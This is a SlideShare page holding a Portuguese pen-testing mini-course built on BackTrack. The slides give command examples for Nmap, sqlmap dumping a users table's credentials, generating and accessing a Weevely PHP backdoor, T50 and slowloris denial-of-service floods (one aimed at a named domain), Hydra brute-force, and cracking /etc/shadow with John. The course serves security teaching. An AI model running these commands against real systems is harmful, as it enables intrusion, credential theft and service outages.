SlideShare uma empresa Scribd logo
Mini Curso:
Pen test com Backtrack
Evandro Villa Verde
Objetivo:

 Fornecer    ao aluno uma visão geral sobre testes de
    invasão

   Entender a anatomia e os tipos diferentes de
    ataques

 Conhecer    as fases de um teste de invasão

 Conhecer    as metodologias e os apectos legais
Visão:

O  Teste de Invasão é um processo de
análise detalhada do nível de
segurança de um sistema ou rede
usando a perspectiva de um infrator.

 O objetivo principal é simular de forma
controlada um ataque real que
normalmente é executado por criminosos.
Fases:

 Os procedimentos realizados por um profissional
de teste de intrusão é similar aos realizados
pelos crackers, diferindo na intenção do ataque.

1.   Levantamento de informações (nome,telefone,endereço)
2.   Varredura (s.o,rede,serviços,firewall)
3.   Ganhar acesso (brute force,trafego,web,vulnerabilidade)
4.   Manter acesso (backdoor e rootkits)
5.   Apagar rastro
Backtrack:

 Backtrack      é um sistema operacional linux baseado
    no Ubuntu.

    É focado em testes de seguranças e testes de
    penetração (pen tests), muito apreciada por hackers
    e analistas de segurança, podendo ser iniciado
    diretamente pelo CD (sem necessidade de instalar
    em disco), mídia removível (pendrive), máquinas
    virtuais ou direto no disco rígido.

Fonte: http://pt.wikipedia.org/wiki/BackTrack
Backtrack:
 Eleé a fusão de duas distribuições que eram bem
  conhecidas na época:
          - Whax e Auditor Security Collection

 Eleito
       em 2006 como a Distribuição Live de
  Segurança número 1º em sua categoria

O  BT possui mais de 300 ferramentas, que vão
  desde teste de intrusão até Analise Forense Digital.

 Versão   atual é BackTrack 5 R3 Released! Aug 13,
  2012
Problema:
 BackTrack   e os Drivers para Wifi e vídeo.

 Ubuntu   desatualizado
Nmap:

   Nmap é um software livre que realiza port scan desenvolvido
    pelo Gordon Lyon, autoproclamado hacker "Fyodor.
   Realiza varredura de rede, buscando hosts ativos, portas
    abertas e serviços sendo executados.
Nmap:
   -sP
   Ping scan: Algumas vezes é necessário saber se um
    determinado host ou rede estáno ar.
   Nmap pode enviar pacotes ICMP “echo request” para
    verificar sedeterminado host ou
   rede está ativa. Hoje em dia, existem muitos filtros
    querejeitam os pacotes ICMP “echo
   request”, então envia um pacote TCP ACK paraa porta 80
    (default) e caso receba RST o
   alvo está ativo. A terceira técnica enviaum pacote SYN e
    espera um RST ou SYN-ACK.
   Nmap –sP 192.168.1.254
   Nmap –sP 192.168.1.0/24
Nmap:

   TCP SYN scan: Técnica também conhecida como “half-open”,
    pois não abre uma conexão TCP completa. É enviado um
    pacote SYN, como se ele fosse uma conexão real e aguarda
    uma resposta. Caso um pacote SYN-ACK seja recebido,
    aporta está aberta, enquanto um como resposta indica que a
    porta está fechada.
   A vantagem dessa abordagem é que poucos irão detectar
    esse scanning de portas.

   Nmap –sS 192.168.1.254
   Nmap –sS 192.168.1.0/24
Nmap:

 -sT
 TCP connect() scan: É a técnica mais básica de
 TCP scanning. É utilizada a chamada de sistema
 (system call) “connect()” que envia um sinal as
 portas ativas. Caso a porta esteja aberta recebe
 como resposta “connect()”. É um dos scan mais
 rápidos, porém fácil de ser detectado

 Nmap –sT 192.168.1.254
 Nmap –sT 192.168.1.0/24
Nmap:

 -sU
 UDP  scan: Este método é utilizado para determinar
  qual porta UDP está aberta em um host. A técnica
  consiste em enviar um pacote UDP de 0 byte para
  cada portado host.
 Se for recebido uma mensagem ICMP “port
  unreachable” então a porta está fechada, senão a
  porta pode estar aberta. Para variar um pouco, a
  Microsoft ignorou a sugestão da RFC e com isso a
  varredura de máquinas Windows é muito rápida.

 Nmap   –sU 192.168.1.254
Nmap:

 -O
 Ativa a identificação do host remoto via TCP/IP. Irá
  apresentar versão do Sistema
 Operacional e tempo ativo.
 Ex.: nmap -O alvo


 -v
 Modo  verbose. Mostra tudo o que está se
  passando.
 Ex.: nmap -v alvo
Nmap:
 -F
 Procura pelas portas que estão no /etc/services.
  Método mais rápido, porém não procurar por todas
  as portas.
 Ex.: nmap -F alvo


 -P0
 Não  tenta pingar o host antes de iniciar a
  varredura. Isto permite varrer alvos que bloqueiam
  ICMP “echo request (ou responses)” através de
  firewall.
 Ex.: nmap -P0 alvo
Xprobe2:
 Xprobe2  analisa banners de sistemas
 operacionais, comparando com um banco de
 dados interno, onde compara-os e informa o S.O.
 utilizado e a versão do mesmo.

 Exemplo:


 xprobe2 [host-name]
 xprobe2 <ip>
Nikto :
    Nikto é um script Perl usado para testar a
    segurança de seu servidor web. Ele
    faz a varredura em servidores Apache tanto em
    busca de vulnerabilidades, quanto de falhas de
    configuração.

 Para   atualizar e executar o Nikto, utilizamos os
    seguintes comandos:

#  ./nikto.pl -update
 # ./nikto.pl -h 192.168.131.1 -o /192.168.131.1.txt
SQL Map:




Local: /pentest/database/sqlmap
String: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" – [opções]
SQL Map :


 “Sqlmap  é uma ferramenta open source para
 penetration test que automatiza o processo de
 detecção e exploiting de vulnerabilidades a Sqli
 Injection, é escrita em python e tem suporte tanto
 GNU linux ou windows.”

O sqlmap além de oferecer as funções para
 detectar e explorar as vulnerabilidades a SQLI, ele
 consegue também tentar “dominar” o sistema de
 banco de dados se for possivel.
SQL Map :

   --help
   Mostra as opções do SQLMAP
   --current-db
   Apresenta o banco de dados atual Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1"
    --current-db
   --banner
   Pega o Banner do DBMS
   Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
   --dbs
   Lista os bancos de dados do DBMS Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
SQL Map :
   --tables
   Apresenta as tabelas do banco selecionado Exemplo:
    ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1"
   -D acuart --tables
   --columns
   Apresenta as colunas da tabela selecionada
   Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1"
   -D acuart -T users --columns
   --dump
   Extrai as informações da colunas selecionadas Exemplo:
    ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1"
   -D acuart -T users -C 'uname,pass' --dump
SQL Map :
   --current-user
   Apresenta o usuário ao qual a página está usando para se
    conectar ao banco Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-
    user
   --is-dba
   Verifica se o usuário atual é administrador do Banco
   Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1" --is-dba
   --users
   Enumera todos os usuários
   Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1" --users
   --search
   Varre o banco atrás do que você procura, pode ser um banco,
    tabela ou coluna
   Exemplo: ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1" --search –
    C „pass‟
SQL Map :

   --user-agent
   Altera o nome do user Agent durante o ataque Exemplo:
    ./sqlmap.py --url
    "http://testphp.vulnweb.com/listproducts.php?cat=1"
   --user-agent=“Mozilla/5.0 (compatible; Googlebot/2.1;
    +http://www.google.com/bot.html)”
   --level=1-5
   Seta o nível de performance que ele irá utilizar para efetuar a
    varredura
   --risk=1-3
   Seta o nível de risco de performance que o sqlmap efetuará
    para a varredura
Weevely:




Local: /pentest/backdoors/web/weevely

String: ./weevely <url> <password> <command>
Weevely:

 Weevely  é um backdoor PHP discreto que simula
 uma conexão telnet. É uma ferramenta essencial
 para ser injetada após a exploração de uma
 vulnerabilidade de uma aplicação web. Com uma
 permissão básica para fazer upload de arquivos
 PHP, você só precisa gerar e fazer o upload do
 código do "servidor" PHP no alvo, e executado
 localmente o Weevely transmiti comandos de shell.
Weevely:

 Uso:
 Gerando  o Backdoor:
 ./weevely generate teste/tmp/back.php
 # Cria um backdoor com a senha eSecurity na
  pasta /tmp

 ./weevelyhttp://www.sitevul.com/back.php teste
 # Acessa a shell utilizando a senha teste
DoS:

  T50 ferramenta de desenvolvida por um brasileiro,
  Nelson Brito, capaz de fazer ataques DoS e DDoS
  usando o conceito de stress testing:

# ./t50 www.ofm.com.br --flood --turbo --dport
  80 -S --protocol ICMP
 ./t50 192.168.1.105 --flood --turbo --dport 80 -S –
  protocol
 --flood
 --turbo (Aumenta a performance)
 -S (envia a flag SYN)
DoS:

 Slowloris: Atacandos velhos apaches

#  wget http://ha.ckers.org/slowloris/slowloris.pl
 # chmod 777 slowloris.pl


 Ele
    funciona enviando, atraves de um
 processo multi-thread, varias requisições
 parciais ao servidor Web alvo
Hydra:




     THC-Hydra (Last update 2012-05-23)

String: hydra –L <login> -P <passwd> <ip> <serv>
Hydra:

#      hydra –l root -p toor –t 12 127.0.0.1 ssh

 Ele  irá efetuar um bruteforce com usuário root
    com a senha toor com 12 threads no
    loopback na porta SSH

#  hydra –l root -P wordlist.txt –t 12 127.0.0.1 ssh
 Ele irá efetuar um bruteforce com usuário root
  com a senha buscando na wordlist.txt com

hydra -l teste -P wordlist 192.168.1.105 http-post-form "/verificar.php:login=^USER^&senha=^PASS^:Login e senha
    incorretos"
Passwd:

O arquivo /etc/passwd contém informações sobre todos os
usuários, inclusive as suas senhas criptografadas. Ele é
legível por todos os usuários e, por isso, estas senhas podem
ser facilmente crackeadas. Para combater esta
vulnerabilidade foi desenvolvido o sistema de sombreamento
de senhas, os shadows passwords.

Quando o sistema de sombreamento de senhas está
disponível, o campo password do arquivo /etc/passwd é
substituído por um "x" e o password do usuário é
armazenado no arquivo /etc/shadow. Por esta razão o
/etc/shadow é legível somente pelo usuário root. Desta
maneira o arquivo /etc/shadow dificulta a ação de crackers.
John :




Local: /pentest/passwords/john

String: ./john arquivo.db
John :
 John the Ripper é um software para quebra de
 senhas. Inicialmente desenvolvido para sistemas
 unix-like, corre agora em vários sistemas
 operativos (como DOS, Windows, Linux, BSD).
 Disponível em versão livre e paga, o John the
 Ripper é capaz fazer força bruta em senhas
 cifradas em DES, MD4 e MD5 entre outras

 Dicionário   (Wordlist): sendo o modo mais
 simples.

 Quebra  Simples (Single Crack): mais indicado
 para início de uma quebra e mais rápido que
 o wordlist
John :


 Ferramenta:   Unshadow

 Utilizadapara unir os arquivos passwd e shadow
  para posteriormente ser quebrada pelo John the
  Ripper

 Exemplo:    ./unshadow /etc/passwd /etc/shadow >>
  hash.db

 Agora   quebramos usando: ./john hash.db
John :


 ./johnsenhas.txt # O modo mais simples de se
  usar o John é especificar o arquivo que tem as
  senhas e usuário e deixar ele fazer tudo

 automaticamente.   Ele irá começar com o modo
  single crack, depois irá passar para o modo
  wordlist e finalmente irá passar para o modo
  incremental.

Mais conteúdo relacionado

Mais procurados

Programação em bat
Programação em batProgramação em bat
Programação em bat
hackernoob
 
Testes Funcionais e Estruturais utilizando Selenium IDE e Cobertura
Testes Funcionais e Estruturais utilizando Selenium IDE e CoberturaTestes Funcionais e Estruturais utilizando Selenium IDE e Cobertura
Testes Funcionais e Estruturais utilizando Selenium IDE e Cobertura
Tiago Antônio da Silva
 
Sapo Sessions PHP
Sapo Sessions PHPSapo Sessions PHP
Sapo Sessions PHP
João Machado
 
Sistemas operacionais1
Sistemas operacionais1Sistemas operacionais1
Sistemas operacionais1
Nauber Gois
 
Linux - Shell e Comandos Básicos
Linux - Shell e Comandos BásicosLinux - Shell e Comandos Básicos
Linux - Shell e Comandos Básicos
Frederico Madeira
 
Introdução ao CMake
Introdução ao CMakeIntrodução ao CMake
Introdução ao CMake
Paulo Remoli
 
O Que é Shell (bash)
O Que é Shell (bash)O Que é Shell (bash)
O Que é Shell (bash)
Sérgio Silva
 
Ferramentas hack wifi aircrack
Ferramentas hack wifi aircrackFerramentas hack wifi aircrack
Ferramentas hack wifi aircrack
Pedro Verissimo
 
Apache2.4 tuning-hands on
Apache2.4 tuning-hands onApache2.4 tuning-hands on
Apache2.4 tuning-hands on
Renato Gomes
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploit
Roberto Soares
 
Python e Linux para a criação de ferramentas para pentest
Python e Linux para a criação de ferramentas para pentestPython e Linux para a criação de ferramentas para pentest
Python e Linux para a criação de ferramentas para pentest
Edson Celio
 
PostgreSQL Dump e Restor - O básico
PostgreSQL Dump e Restor - O básicoPostgreSQL Dump e Restor - O básico
PostgreSQL Dump e Restor - O básico
Bruno Emanuel Silva
 
Curso gratuitoshellscript nivel-2
Curso gratuitoshellscript nivel-2Curso gratuitoshellscript nivel-2
Curso gratuitoshellscript nivel-2
Wanderlei Silva do Carmo
 
Nessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de AtaquesNessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de Ataques
Andre Peres
 
Shell script
Shell scriptShell script
Shell script
Carlos Melo
 
Apostila metasploit
Apostila metasploitApostila metasploit
Apostila metasploit
Rogério Sampaio
 
SegurançA BáSica Do Apache
SegurançA BáSica Do ApacheSegurançA BáSica Do Apache
SegurançA BáSica Do Apache
Felipe Santos
 
[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...
[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...
[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...
Rafael Jaques
 
Procergs php-seguro
Procergs php-seguroProcergs php-seguro
Procergs php-seguro
Flávio Montes
 
Segurança autenticação apache -ppt
Segurança autenticação apache -pptSegurança autenticação apache -ppt
Segurança autenticação apache -ppt
Carlos Melo
 

Mais procurados (20)

Programação em bat
Programação em batProgramação em bat
Programação em bat
 
Testes Funcionais e Estruturais utilizando Selenium IDE e Cobertura
Testes Funcionais e Estruturais utilizando Selenium IDE e CoberturaTestes Funcionais e Estruturais utilizando Selenium IDE e Cobertura
Testes Funcionais e Estruturais utilizando Selenium IDE e Cobertura
 
Sapo Sessions PHP
Sapo Sessions PHPSapo Sessions PHP
Sapo Sessions PHP
 
Sistemas operacionais1
Sistemas operacionais1Sistemas operacionais1
Sistemas operacionais1
 
Linux - Shell e Comandos Básicos
Linux - Shell e Comandos BásicosLinux - Shell e Comandos Básicos
Linux - Shell e Comandos Básicos
 
Introdução ao CMake
Introdução ao CMakeIntrodução ao CMake
Introdução ao CMake
 
O Que é Shell (bash)
O Que é Shell (bash)O Que é Shell (bash)
O Que é Shell (bash)
 
Ferramentas hack wifi aircrack
Ferramentas hack wifi aircrackFerramentas hack wifi aircrack
Ferramentas hack wifi aircrack
 
Apache2.4 tuning-hands on
Apache2.4 tuning-hands onApache2.4 tuning-hands on
Apache2.4 tuning-hands on
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploit
 
Python e Linux para a criação de ferramentas para pentest
Python e Linux para a criação de ferramentas para pentestPython e Linux para a criação de ferramentas para pentest
Python e Linux para a criação de ferramentas para pentest
 
PostgreSQL Dump e Restor - O básico
PostgreSQL Dump e Restor - O básicoPostgreSQL Dump e Restor - O básico
PostgreSQL Dump e Restor - O básico
 
Curso gratuitoshellscript nivel-2
Curso gratuitoshellscript nivel-2Curso gratuitoshellscript nivel-2
Curso gratuitoshellscript nivel-2
 
Nessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de AtaquesNessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de Ataques
 
Shell script
Shell scriptShell script
Shell script
 
Apostila metasploit
Apostila metasploitApostila metasploit
Apostila metasploit
 
SegurançA BáSica Do Apache
SegurançA BáSica Do ApacheSegurançA BáSica Do Apache
SegurançA BáSica Do Apache
 
[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...
[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...
[FISL 16] PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva...
 
Procergs php-seguro
Procergs php-seguroProcergs php-seguro
Procergs php-seguro
 
Segurança autenticação apache -ppt
Segurança autenticação apache -pptSegurança autenticação apache -ppt
Segurança autenticação apache -ppt
 

Destaque

Marco General
Marco GeneralMarco General
Marco General
san blas
 
Cómo hacer concept tests
Cómo hacer concept tests Cómo hacer concept tests
Cómo hacer concept tests
Alfredo Prieto Martín
 
Jornada sobre Seguridad en Medios de Pago: PCI DSS
Jornada sobre Seguridad en Medios de Pago: PCI DSSJornada sobre Seguridad en Medios de Pago: PCI DSS
Jornada sobre Seguridad en Medios de Pago: PCI DSS
Internet Security Auditors
 
Todas as abordagens de testes dentro do ágil
Todas as abordagens de testes dentro do ágilTodas as abordagens de testes dentro do ágil
Todas as abordagens de testes dentro do ágil
Elias Nogueira
 
Os 10 maus hábitos dos desenvolvedores JSF
Os 10 maus hábitos dos desenvolvedores JSFOs 10 maus hábitos dos desenvolvedores JSF
Os 10 maus hábitos dos desenvolvedores JSF
Rafael Ponte
 
Implementando Testes Unitários em Java - Manoel Pimentel
Implementando Testes Unitários em Java - Manoel PimentelImplementando Testes Unitários em Java - Manoel Pimentel
Implementando Testes Unitários em Java - Manoel Pimentel
Manoel Pimentel Medeiros
 
From DOT to Dotty
From DOT to DottyFrom DOT to Dotty
From DOT to Dotty
Martin Odersky
 
Proyecto Domótica Marcelo Bernal
Proyecto Domótica Marcelo BernalProyecto Domótica Marcelo Bernal
Proyecto Domótica Marcelo Bernal
Marcelo Bernal Rocha
 
Curso de Java #10 - Estruturas Condicionais (Parte 2)
Curso de Java #10 - Estruturas Condicionais (Parte 2)Curso de Java #10 - Estruturas Condicionais (Parte 2)
Curso de Java #10 - Estruturas Condicionais (Parte 2)
Curso em Vídeo - Cursos Grátis com Certificado
 
Ericsson Radio Dot System: Introduction
Ericsson Radio Dot System: Introduction Ericsson Radio Dot System: Introduction
Ericsson Radio Dot System: Introduction
Ericsson
 
Certificações em Teste e Qualidade de Software
Certificações em Teste e Qualidade de SoftwareCertificações em Teste e Qualidade de Software
Certificações em Teste e Qualidade de Software
Camilo Ribeiro
 
Ctai Teste De Software Aula 2
Ctai Teste De Software Aula 2Ctai Teste De Software Aula 2
Ctai Teste De Software Aula 2
Victor Hugo Germano
 
El test psicométrico y la evaluación neuropsicológica
El test psicométrico y la evaluación neuropsicológicaEl test psicométrico y la evaluación neuropsicológica
El test psicométrico y la evaluación neuropsicológica
Jorge Luis Chapi Mori - MIMDES / UNMSM / UNFV
 
Diretrizes curriculares nacionais para educação infantil
Diretrizes curriculares nacionais para educação infantilDiretrizes curriculares nacionais para educação infantil
Diretrizes curriculares nacionais para educação infantil
EMEI Julio Alves Pereira
 
Living with licensing
Living with licensingLiving with licensing
Living with licensing
JudicialStudies
 
Minería e fontes de enerxía en España e Galicia
Minería e fontes de enerxía en España e GaliciaMinería e fontes de enerxía en España e Galicia
Minería e fontes de enerxía en España e Galicia
Agrela Elvixeo
 
Abdelaal E 201304
Abdelaal E 201304Abdelaal E 201304
Show foto
Show fotoShow foto
Show foto
sherry2535
 
Proceso de Acreditacion
Proceso de AcreditacionProceso de Acreditacion
Proceso de Acreditacion
victorcala0308
 
Service Desing Week2
Service Desing Week2Service Desing Week2
Service Desing Week2
Bom Kim
 

Destaque (20)

Marco General
Marco GeneralMarco General
Marco General
 
Cómo hacer concept tests
Cómo hacer concept tests Cómo hacer concept tests
Cómo hacer concept tests
 
Jornada sobre Seguridad en Medios de Pago: PCI DSS
Jornada sobre Seguridad en Medios de Pago: PCI DSSJornada sobre Seguridad en Medios de Pago: PCI DSS
Jornada sobre Seguridad en Medios de Pago: PCI DSS
 
Todas as abordagens de testes dentro do ágil
Todas as abordagens de testes dentro do ágilTodas as abordagens de testes dentro do ágil
Todas as abordagens de testes dentro do ágil
 
Os 10 maus hábitos dos desenvolvedores JSF
Os 10 maus hábitos dos desenvolvedores JSFOs 10 maus hábitos dos desenvolvedores JSF
Os 10 maus hábitos dos desenvolvedores JSF
 
Implementando Testes Unitários em Java - Manoel Pimentel
Implementando Testes Unitários em Java - Manoel PimentelImplementando Testes Unitários em Java - Manoel Pimentel
Implementando Testes Unitários em Java - Manoel Pimentel
 
From DOT to Dotty
From DOT to DottyFrom DOT to Dotty
From DOT to Dotty
 
Proyecto Domótica Marcelo Bernal
Proyecto Domótica Marcelo BernalProyecto Domótica Marcelo Bernal
Proyecto Domótica Marcelo Bernal
 
Curso de Java #10 - Estruturas Condicionais (Parte 2)
Curso de Java #10 - Estruturas Condicionais (Parte 2)Curso de Java #10 - Estruturas Condicionais (Parte 2)
Curso de Java #10 - Estruturas Condicionais (Parte 2)
 
Ericsson Radio Dot System: Introduction
Ericsson Radio Dot System: Introduction Ericsson Radio Dot System: Introduction
Ericsson Radio Dot System: Introduction
 
Certificações em Teste e Qualidade de Software
Certificações em Teste e Qualidade de SoftwareCertificações em Teste e Qualidade de Software
Certificações em Teste e Qualidade de Software
 
Ctai Teste De Software Aula 2
Ctai Teste De Software Aula 2Ctai Teste De Software Aula 2
Ctai Teste De Software Aula 2
 
El test psicométrico y la evaluación neuropsicológica
El test psicométrico y la evaluación neuropsicológicaEl test psicométrico y la evaluación neuropsicológica
El test psicométrico y la evaluación neuropsicológica
 
Diretrizes curriculares nacionais para educação infantil
Diretrizes curriculares nacionais para educação infantilDiretrizes curriculares nacionais para educação infantil
Diretrizes curriculares nacionais para educação infantil
 
Living with licensing
Living with licensingLiving with licensing
Living with licensing
 
Minería e fontes de enerxía en España e Galicia
Minería e fontes de enerxía en España e GaliciaMinería e fontes de enerxía en España e Galicia
Minería e fontes de enerxía en España e Galicia
 
Abdelaal E 201304
Abdelaal E 201304Abdelaal E 201304
Abdelaal E 201304
 
Show foto
Show fotoShow foto
Show foto
 
Proceso de Acreditacion
Proceso de AcreditacionProceso de Acreditacion
Proceso de Acreditacion
 
Service Desing Week2
Service Desing Week2Service Desing Week2
Service Desing Week2
 

Semelhante a Mini Curso - Pen Test - Univem

Ferramentas de ataques
Ferramentas de ataquesFerramentas de ataques
Ferramentas de ataques
Carlos Veiga
 
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonFerramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Tchelinux
 
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesDisciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Rogério Almeida
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux
987123987123
 
Back track apresentação
Back track   apresentaçãoBack track   apresentação
Back track apresentação
Kleber Santos
 
Automatizando Nmap com NSE
Automatizando Nmap com NSEAutomatizando Nmap com NSE
Automatizando Nmap com NSE
Tiago Natel de Moura
 
Unidade 2.2.1 nmap
Unidade 2.2.1 nmapUnidade 2.2.1 nmap
Unidade 2.2.1 nmap
Juan Carlos Lamarão
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueando
marcusburghardt
 
Gerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMPGerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMP
André Déo
 
Sistemas operacionais 14
Sistemas operacionais 14Sistemas operacionais 14
Sistemas operacionais 14
Nauber Gois
 
Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao
gleydsonslim
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespes
luizfelipemz
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
Bruno Alexandre
 
Netfilter + Iptables
Netfilter + IptablesNetfilter + Iptables
Netfilter + Iptables
Rodrigo Piovesana
 
Firewall em Linux
Firewall em LinuxFirewall em Linux
Firewall em Linux
guest4e5ab
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
Roberto Castro
 
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei PollonFerramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Tchelinux
 
Ntop
NtopNtop
Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018
Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018
Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018
Tchelinux
 
Supervisão e Monitorização
Supervisão e MonitorizaçãoSupervisão e Monitorização
Supervisão e Monitorização
SAPO Sessions
 

Semelhante a Mini Curso - Pen Test - Univem (20)

Ferramentas de ataques
Ferramentas de ataquesFerramentas de ataques
Ferramentas de ataques
 
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonFerramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei Pollon
 
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesDisciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux
 
Back track apresentação
Back track   apresentaçãoBack track   apresentação
Back track apresentação
 
Automatizando Nmap com NSE
Automatizando Nmap com NSEAutomatizando Nmap com NSE
Automatizando Nmap com NSE
 
Unidade 2.2.1 nmap
Unidade 2.2.1 nmapUnidade 2.2.1 nmap
Unidade 2.2.1 nmap
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueando
 
Gerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMPGerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMP
 
Sistemas operacionais 14
Sistemas operacionais 14Sistemas operacionais 14
Sistemas operacionais 14
 
Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespes
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Netfilter + Iptables
Netfilter + IptablesNetfilter + Iptables
Netfilter + Iptables
 
Firewall em Linux
Firewall em LinuxFirewall em Linux
Firewall em Linux
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei PollonFerramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
 
Ntop
NtopNtop
Ntop
 
Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018
Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018
Introdução ao SystemTap - João Avelino Bellomo Filho - Tchelinux Caxias 2018
 
Supervisão e Monitorização
Supervisão e MonitorizaçãoSupervisão e Monitorização
Supervisão e Monitorização
 

Mini Curso - Pen Test - Univem

  • 1. Mini Curso: Pen test com Backtrack Evandro Villa Verde
  • 2. Objetivo:  Fornecer ao aluno uma visão geral sobre testes de invasão  Entender a anatomia e os tipos diferentes de ataques  Conhecer as fases de um teste de invasão  Conhecer as metodologias e os apectos legais
  • 3. Visão: O Teste de Invasão é um processo de análise detalhada do nível de segurança de um sistema ou rede usando a perspectiva de um infrator.  O objetivo principal é simular de forma controlada um ataque real que normalmente é executado por criminosos.
  • 4. Fases:  Os procedimentos realizados por um profissional de teste de intrusão é similar aos realizados pelos crackers, diferindo na intenção do ataque. 1. Levantamento de informações (nome,telefone,endereço) 2. Varredura (s.o,rede,serviços,firewall) 3. Ganhar acesso (brute force,trafego,web,vulnerabilidade) 4. Manter acesso (backdoor e rootkits) 5. Apagar rastro
  • 5. Backtrack:  Backtrack é um sistema operacional linux baseado no Ubuntu.  É focado em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido. Fonte: http://pt.wikipedia.org/wiki/BackTrack
  • 6. Backtrack:  Eleé a fusão de duas distribuições que eram bem conhecidas na época: - Whax e Auditor Security Collection  Eleito em 2006 como a Distribuição Live de Segurança número 1º em sua categoria O BT possui mais de 300 ferramentas, que vão desde teste de intrusão até Analise Forense Digital.  Versão atual é BackTrack 5 R3 Released! Aug 13, 2012
  • 7. Problema:  BackTrack e os Drivers para Wifi e vídeo.  Ubuntu desatualizado
  • 8. Nmap:  Nmap é um software livre que realiza port scan desenvolvido pelo Gordon Lyon, autoproclamado hacker "Fyodor.  Realiza varredura de rede, buscando hosts ativos, portas abertas e serviços sendo executados.
